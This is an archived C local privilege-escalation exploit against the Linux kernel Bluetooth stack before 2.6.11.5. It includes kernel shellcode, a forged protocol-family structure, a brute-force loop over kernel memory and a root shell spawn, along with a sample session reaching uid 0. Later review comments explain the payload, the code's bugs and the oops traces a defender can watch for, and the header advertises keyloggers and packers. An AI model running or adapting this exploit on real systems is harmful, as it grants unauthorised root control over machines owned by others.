
Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit

Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit

Code Language : C
  1. /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT
  2. *
  3. * 19 October 2005
  4.  
  5. [url]http://backdoored.net[/url]
  6. Visit us for Undetected keyloggers and packers.Thanx
  7.  
  8.  
  9. h4x0r bluetooth $ id
  10. uid=1000(addicted) gid=100(users) groups=100(users)
  11. h4x0r bluetooth $
  12.  
  13. h4x0r bluetooth $ ./backdoored-bluetooth
  14. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  15. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  16. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  17. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  18. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  19. Checking the Effective user id after overflow : UID = 0
  20. h4x0r bluetooth # id
  21. uid=0(root) gid=0(root) groups=100(users)
  22. h4x0r bluetooth #
  23.  
  24. h4x0r bluetooth # dmesg
  25. PREEMPT SMP
  26. Modules linked in:
  27. CPU:  0
  28. EIP:  0060:[<c0405ead>]  Not tainted VLI
  29. EFLAGS: 00010286  (2.6.9)
  30. EIP is at bt_sock_create+0x3d/0x130
  31. eax: ffffffff  ebx: ffebfe34  ecx: 00000000  edx: c051bea0
  32. esi: ffffffa3  edi: ffffff9f  ebp: 00000001  esp: c6729f1c
  33. ds: 007b  es: 007b  ss: 0068
  34. Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20)
  35. Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34
  36.     00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34
  37.     c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80
  38. Call Trace:
  39.  [<c039a3bb>] __sock_create+0xfb/0x2a0
  40.  [<c039a58d>] sock_create+0x2d/0x40
  41.  [<c039a60b>] sys_socket+0x2b/0x60
  42.  [<c039b4e8>] sys_socketcall+0x68/0x260
  43.  [<c0117a9c>] finish_task_switch+0x3c/0x90
  44.  [<c0117b07>] schedule_tail+0x17/0x50
  45.  [<c0115410>] do_page_fault+0x0/0x5e9
  46.  [<c01031af>] syscall_call+0x7/0xb
  47. Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00
  48. 85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40
  49.  
  50. */
  51.  
  52.  
  53. #include <stdio.h>
  54. #include <stdlib.h>
  55. #include <sys/socket.h>
  56. #include <arpa/inet.h>
  57. #include <sys/types.h>
  58. #include <unistd.h>
  59. #include <limits.h>
  60. #include <signal.h>
  61. #include <sys/wait.h>
  62.  
  63. #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000
  64. #define KERNEL_SPACE_MEMORY_BRUTE_END  0xffffffff
  65. #define KERNEL_SPACE_BUFFER 0x100000
  66.  
  67.  
/*
 * Global payload: raw x86 machine code that runs in kernel context if the
 * kernel calls the fake net_proto_family.create pointer built in main().
 * Reading the opcodes: it masks esp with 0xfffff000, loads the pointer stored
 * at that address, writes zero into four 32-bit fields at fixed offsets
 * (0x17c, 0x180, 0x18c, 0x190) of the object that pointer refers to, and then
 * returns with eax = 0xffffffff.
 * NOTE(review): those offsets are specific to one kernel build — presumably
 * credential fields, since the harness checks geteuid() afterwards — so on any
 * other kernel the attempt ends in the SIGSEGV/oops shown in the header rather
 * than a changed uid. A user process oopsing inside bt_sock_create with an
 * odd protocol number (see dmesg above) is the artifact a defender can look for.
 */
char asmcode[] = /*Global shellcode*/

"\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a"
"\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b"
"\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90"
"\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3";
  74.  
  75.  
  76.  
/*
 * User-space copy of the kernel's struct net_proto_family layout for the
 * kernel range named in the header. main() allocates one of these, sets
 * family and points create at asmcode; everything else stays zero.
 * NOTE(review): the field order and sizes must match the running kernel's
 * definition byte for byte — the kernel presumably reads `create` at a fixed
 * offset — so the stand-in types used here (int *sock, int *owner) are only
 * size-compatible on 32-bit x86.
 */
struct net_proto_family {
    int family;                              /* set to AF_BLUETOOTH in main() */
    int (*create) (int *sock, int protocol); /* pointed at asmcode in main() */
    short authentication;
    short encryption;
    short encrypt_net;
    int  *owner;                             /* left NULL */
};
  85.  
  86.  
/*
 * Reap one brute-force child and classify how it ended.
 *
 * status: scratch storage for waitpid(); it is passed by value, so the
 *         caller's variable is never updated (main() passes an uninitialised
 *         int and never reads it back).
 * pid:    child to wait for; blocks until it exits.
 *
 * A child that exited normally with any code other than 0xFF terminates the
 * whole program via exit(-1). A child killed by a signal (the SIGSEGV
 * "KERNEL Oops" lines in the header) is reported on stdout and its signal
 * number is returned.
 * NOTE(review): no value is returned on the exit-0xFF path or when the child
 * neither exited nor was signalled; main() ignores the result, so this is
 * latent UB only. As visible here brute_socket_create exits with
 * EXIT_FAILURE/EXIT_SUCCESS, never 0xFF, so any child that survives the
 * socket() call ends the run. strsignal() needs <string.h>, which this file
 * does not include.
 */
int check_zombie_child(int status,pid_t pid)
{
    waitpid(pid,&status,0);
    if(WIFEXITED(status))
    {
        if(WEXITSTATUS(status) != 0xFF)
            exit(-1);
    }
    else if (WIFSIGNALED(status))
    {
        printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status)));
        return(WTERMSIG(status));
    }
}
  101.  
  102.  
/*
 * Child-side body of one brute-force attempt.
 *
 * negative_proto_number: the protocol argument handed to socket(); main()
 *         derives it so that it is a negative index relative to the window
 *         being guessed (see the where_kernel arithmetic there). The oops in
 *         the header shows the fault inside bt_sock_create, consistent with
 *         that index being used unchecked for a table lookup.
 *
 * After the call the child checks geteuid(): non-zero means nothing changed
 * and it exits EXIT_FAILURE; zero means the payload ran and /bin/sh is
 * exec'd. Never returns normally — every path exit()s or exec()s.
 * NOTE(review): socket()'s return value is ignored. On a kernel at or above
 * the 2.6.11.5 threshold in the title the call simply fails with an error,
 * the uid check fails, and the parent stops. The declaration after a
 * statement requires C99.
 */
int brute_socket_create (int negative_proto_number)
{
    socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */
    int i;
    i = geteuid();
    printf("Checking the Effective user id after overflow : UID = %d\n",i);
    if(i)
        exit(EXIT_FAILURE);
    printf("0wnage D0ne bro.\n");
    execl("/bin/sh","sh",NULL);
    exit(EXIT_SUCCESS);
}
  115.  
  116.  
/*
 * Driver: walks kernel address space from KERNEL_SPACE_MEMORY_BRUTE_START in
 * windows of KERNEL_SPACE_BUFFER (1 MiB). For each window it forks a child
 * that calls socket(AF_BLUETOOTH, SOCK_RAW, <negative index>) and then reaps
 * it; a child killed by a signal is reported and the next window is tried.
 *
 * Defender's view: on an affected kernel one run leaves a burst of oopses in
 * dmesg with EIP in bt_sock_create (header transcript) and one SIGSEGV-killed
 * child per window, all from the same parent pid — that is the observable
 * artifact. The title gives 2.6.11.5 as the fixed version.
 *
 * NOTE(review) on the harness itself:
 *  - malloc() is unchecked; bzero() needs <strings.h>, not included here.
 *  - fork() failure (-1) is not handled; the parent would then waitpid(-1).
 *  - `status` is never written in this function (passed by value below).
 *  - brute_start += KERNEL_SPACE_BUFFER wraps from 0xfff00000 to 0
 *    (unsigned), so `brute_start < KERNEL_SPACE_MEMORY_BRUTE_END` never
 *    becomes false and the loop only ends via exit() in check_zombie_child.
 *  - the second banner printf has no trailing newline.
 */
int main(void)
{

    pid_t pid;
    int counter;
    int status;
    int *kernel_return;

    char kernel_buffer[KERNEL_SPACE_BUFFER];   /* 1 MiB array on the stack */
    unsigned int brute_start;
    unsigned int where_kernel;

    struct net_proto_family *bluetooth;

    /* Fake net_proto_family in user memory; only family and create are non-zero. */
    bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family));
    bzero(bluetooth,sizeof(struct net_proto_family));

    bluetooth->family = AF_BLUETOOTH;
    bluetooth->authentication = 0x0; /* No Authentication */
    bluetooth->encryption   = 0x0; /* No Encryption */
    bluetooth->encrypt_net  = 0x0; /* No Encrypt_net */
    bluetooth->owner     = 0x0; /* No fucking owner  */
    bluetooth->create     = (int *) asmcode; /* char array address stored into a function-pointer field via cast */

    /* Fill every 4-byte slot of kernel_buffer with the fake struct's address,
     * so a pointer-sized read landing anywhere inside the buffer yields it. */
    kernel_return = (int *) kernel_buffer;

    for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++)
        *kernel_return = (int)bluetooth;

    brute_start = KERNEL_SPACE_MEMORY_BRUTE_START;
    printf("Bluetooth stack local root exploit\n");
    printf("http://backdoored/net");

    while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END )
    {
        /* Negated slot distance between this window's base and kernel_buffer:
         * brute_start + 4 * where_kernel == &kernel_buffer (mod 2^32). */
        where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ;
        where_kernel = -where_kernel;

        pid = fork();
        if(pid == 0 )
            brute_socket_create(where_kernel);   /* child: never returns */
        check_zombie_child(status,pid);          /* parent: reap and classify */
        brute_start += KERNEL_SPACE_BUFFER;
        fflush(stdout);
    }
    return 0;
}
  166.  
  167. // milw0rm.com [2007-12-18]
